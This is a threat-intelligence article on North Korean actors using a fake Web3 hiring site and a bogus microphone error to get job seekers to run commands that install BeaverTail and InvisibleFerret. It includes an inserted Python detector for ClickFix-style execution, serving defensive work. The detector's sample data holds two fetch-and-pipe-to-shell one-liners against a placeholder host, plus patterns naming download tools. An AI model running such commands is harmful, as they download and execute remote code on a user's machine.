North Korean Hackers Exploit ClickFix Tactic to Deploy BeaverTail Malware in Cryptocurrency Job Scams

In a recent cybersecurity development, threat actors affiliated with the Democratic People’s Republic of Korea (DPRK) have been identified utilizing the ClickFix social engineering technique to disseminate the BeaverTail malware. This campaign specifically targets individuals seeking employment in the cryptocurrency and retail sectors, focusing on roles such as marketing and trading.

The ClickFix method involves deceiving users into executing malicious commands under the guise of resolving non-existent technical issues. In this instance, the attackers lure job seekers to a counterfeit hiring platform, prompting them to complete a video assessment. During this process, a fabricated error message appears, alleging a microphone malfunction. Victims are then instructed to run operating system-specific commands to fix the issue, which, in reality, initiates the deployment of a streamlined version of the BeaverTail malware.

BeaverTail, a JavaScript-based information stealer, has been previously associated with North Korean cyber operations. It functions by extracting sensitive data from infected systems and serves as a conduit for additional payloads, such as the Python-based backdoor known as InvisibleFerret. Notably, this campaign marks a shift in targeting strategies, moving from software developers to individuals in marketing and trading positions within the cryptocurrency and retail industries.

The attackers employ a fake hiring platform hosted on Vercel to distribute the malware. This platform advertises positions at various Web3 organizations and encourages targets to invest in a Web3 company. Upon visiting the site, users’ public IP addresses are recorded, and they are prompted to complete a video assessment. At this juncture, the fabricated microphone error is presented, leading victims to execute commands that result in the installation of the BeaverTail malware.
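The ClickFix flow described above ends with the victim pasting an operating-system-specific "fix" command into a Run dialog or terminal, so the most useful defensive signal is a process-creation event whose parent is the interactive desktop shell or terminal and whose command line fetches something remote and hands it straight to an interpreter. The following detection heuristic is an added example, not code from the article or from the campaign: the event tuples, parent-process list and regular expressions are constructed for illustration and are assumptions, not indicators published about this campaign.

```python
import re

# Constructed, simplified process-creation events (not real telemetry from the
# campaign). Fields: parent process, child process, full command line.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -c "irm https://example.invalid/fix-mic | iex"'),
    ("Terminal", "bash",
     "bash -c 'curl -fsSL https://example.invalid/mic-driver.sh | bash'"),
    ("explorer.exe", "cmd.exe", "cmd /c ipconfig /all"),
    ("Code.exe", "node.exe", "node build.js"),
]

# Assumed heuristics for a ClickFix-style "paste this to fix it" execution:
# a shell launched from the desktop shell or a terminal, a remote fetch in the
# command line, and that fetch piped straight into an interpreter.
INTERACTIVE_PARENTS = {"explorer.exe", "WindowsTerminal.exe", "Terminal",
                       "iTerm2", "gnome-terminal"}
REMOTE_FETCH = re.compile(
    r"\b(curl|wget|irm|iwr|Invoke-WebRequest|Invoke-RestMethod)\b", re.I)
PIPE_TO_INTERP = re.compile(
    r"\|\s*(iex|Invoke-Expression|bash|sh|zsh|python3?|node)\b", re.I)
HIDDEN_FLAG = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

def score_event(parent, child, cmdline):
    """Return the list of indicator names matched by one event."""
    reasons = []
    if parent in INTERACTIVE_PARENTS:
        reasons.append("launched from interactive shell/terminal")
    if REMOTE_FETCH.search(cmdline):
        reasons.append("remote fetch in command line")
    if PIPE_TO_INTERP.search(cmdline):
        reasons.append("download piped to interpreter")
    if HIDDEN_FLAG.search(cmdline):
        reasons.append("hidden window requested")
    return reasons

def flag_clickfix(events, min_reasons=2):
    """Flag events with a remote fetch plus at least one more indicator."""
    flagged = []
    for parent, child, cmdline in events:
        reasons = score_event(parent, child, cmdline)
        if len(reasons) >= min_reasons and "remote fetch in command line" in reasons:
            flagged.append((child, cmdline, reasons))
    return flagged

if __name__ == "__main__":
    for child, cmdline, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {child}: {cmdline}\n  reasons: {'; '.join(reasons)}")
```

Legitimate `curl ... | sh` installers run from a terminal will also match, so in production this rule belongs in a triage queue with the user's job-search context (newly visited recruiting sites, browser download history) rather than as an automatic block.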

This iteration of BeaverTail exhibits a simplified information-stealing routine, targeting fewer browser extensions—specifically eight, compared to the 22 targeted in previous versions. Additionally, functions related to extracting data from web browsers other than Google Chrome have been omitted. The Windows variant of BeaverTail utilizes a password-protected archive to load Python dependencies associated with InvisibleFerret, indicating an evolution in the attackers’ methodologies.

The use of password-protected archives for payload delivery is a technique that has been observed among various threat actors. However, this marks the first instance of its application in conjunction with BeaverTail, suggesting that the DPRK-affiliated hackers are continually refining their attack strategies to enhance effectiveness and evade detection.

This campaign underscores the persistent and evolving threat posed by state-sponsored cyber actors targeting the cryptocurrency sector. It highlights the importance of vigilance among job seekers and organizations in the industry, emphasizing the need for robust cybersecurity measures and awareness to mitigate such sophisticated social engineering attacks.